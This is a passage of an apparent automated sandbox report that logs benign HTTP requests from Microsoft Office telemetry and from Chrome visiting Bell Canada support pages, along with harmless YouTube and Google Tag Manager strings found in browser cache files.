Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__13 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=3&dv=1&dl=726&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /egw/5/qceuv8449dzg58ptt1bhda9g8ue19c7s/track/__cool.gif?data=eyJldmVudHMiOiBbCiAgICB7InNlc3Npb25fc2NyZWVuX3NpemUiOiAiMTI4MHgxMDI0Iiwic2Vzc2lvbl9kdWEiOiAiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2Iiwic2Vzc2lvbl9wbGF0Zm9ybSI6ICJXaW4zMiIsInBhZ2VfdGl0bGUiOiAiTWFuYWdlIHlvdXIgQmVsbCBzZXJ2aWNlcyBvbiB0aGUgZ28iLCJwYWdlX3VybCI6ICJodHRwczovL3N1cHBvcnQuYmVsbC5jYS9CaWxsaW5nLWFuZC1BY2NvdW50cy9tYW5hZ2VfeW91cl9iZWxsX3NlcnZpY2VzX29uX3RoZV9nbyNFWFQ9TU9CX1VSTF9icmFuY2hfZ2V0YXBwbG9naW5wYWdlXzAxMjQyM19NSCIsInRyYWNrZXJfdHlwZSI6ICJqYXZhc2NyaXB0IiwidHJhY2tlcl92ZXJzaW9uIjogIjIuMi4yMyIsImV2ZW50X25hbWUiOiAic2Vzc2lvbl9zdGFydCIsImV2ZW50X3RpbWVzdGFtcF9lcG9jaCI6ICIxNzMwMzgwMzc3MjU4IiwiZXZlbnRfdGltZXpvbmVfb2Zmc2V0IjogLTQsInVzZXJfaWQiOiAiMTkyZTJiNTJjNDI0MTYtMDcyMGMwOTkyN2Y5NTUtMjYwMzFlNTEtMTQwMDAwLTE5MmUyYjUyYzQzM2UiLCJ1cmwiOiAiaHR0cHM6Ly9zdXBwb3J0LmJlbGwuY2EvQmlsbGluZy1hbmQtQWNjb3VudHMvbWFuYWdlX3lvdXJfYmVsbF9zZXJ2aWNlc19vbl90aGVfZ28jRVhUPU1PQl9VUkxfYnJhbmNoX2dldGFwcGxvZ2lucGFnZV8wMTI0MjNfTUgiLCJmb3JtSWQiOiBudWxsLCJmb3JtVHJpZ2dlclR5cGUiOiBudWxsLCJrYW1weWxlX2RhdGEiOiB7Im1kX2lzU3VydmV5U3VibWl0dGVkSW5TZXNzaW9uIjogIiIsIkxBU1RfSU5WSVRBVElPTl9WSUVXIjogIiIsIkRFQ0xJTkVEX0RBVEUiOiAiIiwia2FtcHlsZUludml0ZVByZXNlbnRlZCI6ICIiLCJrYW1weWxlX3VzZXJpZCI6ICI3ODk1LWJmY2YtNjExNC1kZWQ2LWM5MTQtN2JmMC0zMzc5LTg4NGEiLCJrYW1weWxlVXNlclNlc3Npb24iOiAiMTczMDM4MDM3NzI0OCIsImthbXB5bGVVc2VyUGVyY2VudGlsZSI6ICIiLCJTVUJNSVRURURfREFURSI6ICIifSwiY29va2llX3NpemUiOiAyODE0LCJrYW1weWxlX3ZlcnNpb24iOiAiMi41Ny4wIiwib25zaXRlX3ZlcnNpb24iOiAiMi41Ny4wIiwiaGlzdG9yeV9sZW5ndGgiOiAxLCJldmVudF9sb2NhbF90aW1lc3RhbXAiOiAxNzMwMzgwMzc3MjU4LCJwb3NpdGlvbiI6IG51bGwsImlzVXNlcklkZW50aWZpZWQiOiBmYWxzZX0KXX0= HTTP/1.1Host: udc-neb.kampyle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /p/action/19004038.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=3C32A0BCB9AE6F030E85B595B85F6EBE
Source: global trafficHTTP traffic detected: GET /td/rul/953414520?random=1730380379227&cv=11&fst=1730380379227&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fsupport.bell.ca%2FBilling-and-Accounts%2Fmanage_your_bell_services_on_the_go&hn=www.googleadservices.com&frm=0&tiba=Manage%20your%20Bell%20services%20on%20the%20go&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUluOG7rAMHEbdj-Ua_R3N0vCtoIba9CQhUZwM7uJdinHDgXKrZfaghEmRLXyZM
Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=12&dv=1&dl=74&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=9&dv=1&dl=91&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=10&dv=1&dl=279&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__3 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcObIf-None-Match: W/"5b-OF2eekEBDEYMEmpSQw1Jg9iVBCI"
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=7&dv=1&dl=70&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=8&dv=1&dl=103&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=11&dv=1&dl=84&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /tag/uet/19004038 HTTP/1.1Host: www.clarity.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/953414520/?random=1730380379227&cv=11&fst=1730380379227&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fsupport.bell.ca%2FBilling-and-Accounts%2Fmanage_your_bell_services_on_the_go&hn=www.googleadservices.com&frm=0&tiba=Manage%20your%20Bell%20services%20on%20the%20go&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUluOG7rAMHEbdj-Ua_R3N0vCtoIba9CQhUZwM7uJdinHDgXKrZfaghEmRLXyZM
Source: global trafficHTTP traffic detected: GET /wdccan/36793/onsite/embed.js HTTP/1.1Host: resources.digital-cloud.medallia.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "ab480182e18a16841a9028d8857825bb"If-Modified-Since: Wed, 30 Oct 2024 09:03:40 GMT
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__9 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__10 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__11 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__1 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=16&dv=1&dl=324&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=18&dv=1&dl=85&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=13&dv=1&dl=77&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=browser&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=15&dv=1&dl=64&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=14&dv=1&dl=67&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=html&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=17&dv=1&dl=55357&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: chromecache_391.2.dr, chromecache_503.2.drString found in binary or memory: const defaultSource = 'https://www.youtube.com/embed/'; equals www.youtube.com (Youtube)
Source: chromecache_391.2.dr, chromecache_503.2.drString found in binary or memory: const defaultSource = 'https://www.youtube.com/embed/'; equals www.youtube.com (Youtube)
Source: chromecache_391.2.dr, chromecache_503.2.drString found in binary or memory: tag.src = 'https://www.youtube.com/iframe_api'; equals www.youtube.com (Youtube)
Source: chromecache_391.2.dr, chromecache_503.2.drString found in binary or memory: tag.src = 'https://www.youtube.com/iframe_api'; equals www.youtube.com (Youtube)
Source: chromecache_315.2.dr, chromecache_436.2.dr, chromecache_479.2.dr, chromecache_468.2.drString found in binary or memory: Math.round(q);t["gtm.videoElapsedTime"]=Math.round(f);t["gtm.videoPercent"]=r;t["gtm.videoVisible"]=u;return t},rk:function(){e=pb()},zd:function(){d()}}};var Yb=ka(["data-gtm-yt-inspected-"]),nD=["www.youtube.com","www.youtube-nocookie.com"],oD,pD=!1; equals www.youtube.com (Youtube)
Source: chromecache_478.2.dr, chromecache_438.2.drString found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var k=UA(a,c,e);S(121);if(k["gtm.elementUrl"]==="https://www.facebook.com/tr/")return S(122),!0;if(d&&f){for(var m=Ab(b,g.length),n=0;n<g.length;++n)g[n](k,m);return m.done}for(var p=0;p<g.length;++p)g[p](k,function(){});return!0},XA=function(){var a=[],b=function(c){return db(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
